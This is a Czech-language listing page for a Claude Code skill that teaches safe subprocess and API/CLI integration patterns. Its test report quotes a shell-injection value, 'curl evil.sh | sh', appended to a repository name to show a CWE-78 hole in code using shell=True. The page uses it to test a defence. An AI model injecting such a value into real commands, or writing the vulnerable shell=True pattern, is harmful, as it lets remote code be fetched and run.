API Integration Patterns
Bezpečné vzory pro API/CLI v podprocesech: žádné shell=True, povolené příkazy, zpětný útlum opakování, validace tokenů.
Otestováno · Funguje
Co umí
Referenční vzorový skill, který poskytuje bezpečné vzory pro podprocesy, GitHub CLI, opakování s útlumem, autentizaci a omezování rychlosti, když Claude píše kód pro integraci externího API nebo CLI. Spouští se na klíčová slova subprocess/gh-cli/API-call/retry/auth a výslovně vylučuje úpravy interních funkcí nebo pouze konfigurace.
Testovací report
Skutečný test CWE-78: základní kód používal shell=True s názvem repozitáře ve formátu f-string, což umožnilo vytvořené hodnotě repozitáře přidat 'curl evil.sh | sh'; verze skillu s polem argv a shell=False prošla stejný škodlivý řetězec přes gh jako jeden inertní argument. Konkrétní, ne kosmetické.
Testováno: 2026-07-15 · Claude Code 2.x (agent harness)
Instalace
git clone https://github.com/akaszubski/autonomous-dev cd autonomous-dev mkdir -p ~/.claude/skills cp -r plugins/autonomous-dev/skills/api-integration-patterns ~/.claude/skills/api-integration-patterns
Příkazy a ukázkové prompty
/api-integration-patternsBezpečné vzory pro API/CLI v podprocesech: žádné shell=True, povolené příkazy, zpětný útlum opakování, validace tokenů.
Skilly se spouštějí běžnými požadavky — žádné příkazy k zapamatování. Po instalaci ho aktivují prompty jako tyto (anglicky):
Write a Python function that lists GitHub issues via the gh CLIAdd retry logic with exponential backoff to my API client codeHelp me safely handle subprocess calls without shell injection risk